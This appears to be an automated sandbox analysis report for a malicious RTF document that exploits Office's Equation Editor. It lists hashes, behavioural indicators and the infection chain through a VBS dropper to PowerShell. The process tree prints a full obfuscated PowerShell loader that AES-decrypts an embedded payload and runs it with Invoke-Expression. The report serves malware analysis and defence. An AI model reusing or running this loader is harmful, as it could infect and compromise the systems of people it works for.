Analysis
-
max time kernel
99s -
max time network
44s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
29-07-2024 13:26
Static task
static1
Behavioral task
behavioral1
Sample
f7c34c11bb5d9cdcece78edae0beff42.rtf
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
f7c34c11bb5d9cdcece78edae0beff42.rtf
Resource
win10v2004-20240709-en
General
-
Target
f7c34c11bb5d9cdcece78edae0beff42.rtf
-
Size
94KB
-
MD5
f7c34c11bb5d9cdcece78edae0beff42
-
SHA1
96f2510fbb5c6203e21ead4dd55daaab59a86f4e
-
SHA256
112181241c7cb66758507fdce08e40069efa3e82bedb39eb98c833e5291109d3
-
SHA512
9b733c0d88c98adfe48e45079276ff7e059540445aa576b9eb637ac5c6881586336740384d71ab8a98e24b6f13c76d2ad88dd4437077dabd6a8d7829cd037164
-
SSDEEP
768:GS6MQ5k2WKcczrYFUoNVEbHfwFclPY49Ug+:tSWKccXYtclPYaA
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
EQNEDT32.EXEpowershell.exeflow pid process 3 2368 EQNEDT32.EXE 5 2112 powershell.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
WINWORD.EXEEQNEDT32.EXEWScript.exepowershell.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EQNEDT32.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 2152 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2112 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2112 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 2152 WINWORD.EXE 2152 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
EQNEDT32.EXEWScript.exeWINWORD.EXEdescription pid process target process PID 2368 wrote to memory of 2784 2368 EQNEDT32.EXE WScript.exe PID 2368 wrote to memory of 2784 2368 EQNEDT32.EXE WScript.exe PID 2368 wrote to memory of 2784 2368 EQNEDT32.EXE WScript.exe PID 2368 wrote to memory of 2784 2368 EQNEDT32.EXE WScript.exe PID 2784 wrote to memory of 2112 2784 WScript.exe powershell.exe PID 2784 wrote to memory of 2112 2784 WScript.exe powershell.exe PID 2784 wrote to memory of 2112 2784 WScript.exe powershell.exe PID 2784 wrote to memory of 2112 2784 WScript.exe powershell.exe PID 2152 wrote to memory of 976 2152 WINWORD.EXE splwow64.exe PID 2152 wrote to memory of 976 2152 WINWORD.EXE splwow64.exe PID 2152 wrote to memory of 976 2152 WINWORD.EXE splwow64.exe PID 2152 wrote to memory of 976 2152 WINWORD.EXE splwow64.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\f7c34c11bb5d9cdcece78edae0beff42.rtf"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2152 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:976
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seemsitsgreattoreleasethedargon.vBS"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI78788979119683530985530790090406CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIxnPEzukRsRmzojEc2IqrsP6SzVylf4Lg1SsmmstVoJpV85MKYUwolNJkrLCOU5mJEMqMV+12DiEJ79pZ9yIaWkX01VWnCHXhB3HYMrMthz9dx3qVZG5quEhCgfQ6Zph6Ax6Lf4RH+PZR7dkdCwyLFaWfarqe/MQK49YgyXHqf8xybMvrfjAGQmSb8+3rz+o3mw40bVJxQ6m8tQdAkw6sCVRflXiNsvVPXd9z2Xi0ad/BdcF037OL0GwjtXRs4HTNhF7nzo4Ed5q/h3dLLIMSn2J+w2IWk+U5mgaGh75IlTQeR4SwCUwM45ySFmY56HoQ3vHGf2N49OpVzffLKifgubFQg5jD8FvJXO8aoVjOSTJCW69aOoGZTyK5J0HIGG5gJvjVmBk6igl+L+8yDRg781ddUNbUdYL922Qeo/CBrATzZ7nIcK64Yvri5jOiE57sC7hW5qPZlABLBL4Es2RDH83nRO7hflBwRplmsQrhQE08BcAtC5/H/dUM/kvdtXeeOX8Tuu7lESLHAr56TF9GhVOHA8prMr/tS2ZR0hyZfm7Bu3Tmdu+x2fwwzem8z+mBAmD/XKsxM6sTzoC3n1Ae0JVe73Zercxs+BmJJpbgXjZ+Q9u57NNqoS6U2CdC72jMJxHKDE4+VSNlWGl5O7OlHVD7o3Qsvf69qB0gqacfvTobcTSWza0EJF9kQ+5z3ZIN4RDUiT7O+w3Uqio7O7mnXWYIN/7LtXn62LFIRF3KVPy/5e+G9c8TEWAjIuK16XOWGMdYryMqIXHJ3DJ7W8AUmlfwhUaV8fAeSoTOsK9/b9nBvoFbAx5+hsd0hyHmpInkBC2DS/badEfD6PQJYrYcjkbGi0RoNniC2jHpPPdWIvIlnj2s8yLFbY35KLplcF4i3yVyXJ5kbYsqU3WF61Q38O8XXyiS2NXcTWzwb8zvTWXKUc8sjaWjj35wSYokblJCUj2oyo2B867XR0zuJ5ksaLRPpHeo9i8gtJ0FS5wmJ0XoFxiBz5+4fqoH7wQvJCQRXOb6f27I25twnb2ObtgolO3WOhl0izHAioF+1H3wM0sVxYtpu5z57tcag6+v30kNNbaBzxG+tzD5ToOrfi6Tce9xTGxoPOyFIIJJOJZGzdk4+HSKzeN9fZHZQXV8aKZDPujY3w9+PjqbvvKoSuY4psjbQuBgyGcFtkTHImmPuptN8Olz+SkUIa6Kcui5IEhw705+l8XTPBh3pewFIhVmN03zvUALvhifDR5gzFw3dgrcWS3k5q6w+21FcfYm4h9Rwx8pqfh5aEbMHkAsAhUbfwnDKj0Bzvd7b6h/aeqdx4BtT4PyDGMyDSZHQqQUtx5o2A/sy7aoFXDUGZw3QV3NebZhx2Lzm6xnxF43aMw22YC8GLh2Dks7+J5AnS+B3cZu3E5Mr1FIaQ/ekLxwOA/T8A==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2112
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD5883a161bbdf8c2dd10269f9b3e79d834
SHA183674048ad3fc9a751031fa64992a8eae0053873
SHA256e11337f4eac56272c13e4cb3e0a658c151a187e67351ba4449eb1326bcee57ab
SHA512e6d7bea67c26f1d7015b44b251248bb6963641b117a523b8cdbf83c88f171a9098640570c0e79dff95868e9cff11ae989beb4e5c32dd2b905098ae070c6648e6
-
Filesize
403KB
MD51e06a0b540d76abb6e2712fa7e37138a
SHA11e7a793fe2bcd27f2757969043cdf5f5231e977e
SHA2567d9be9418bca7c307c7fed9ab4ad56058363ee8ad59ae401cfdbcbea7ff252e9
SHA5122b7cde726ee68b9d1cfa24c4413ebf5ab9f026b758d7cc4b6d9c6ad4eaf4b626abdde06e55d529ff2092e06f16dc8f86df935db118727733b1cd6c7284a5184a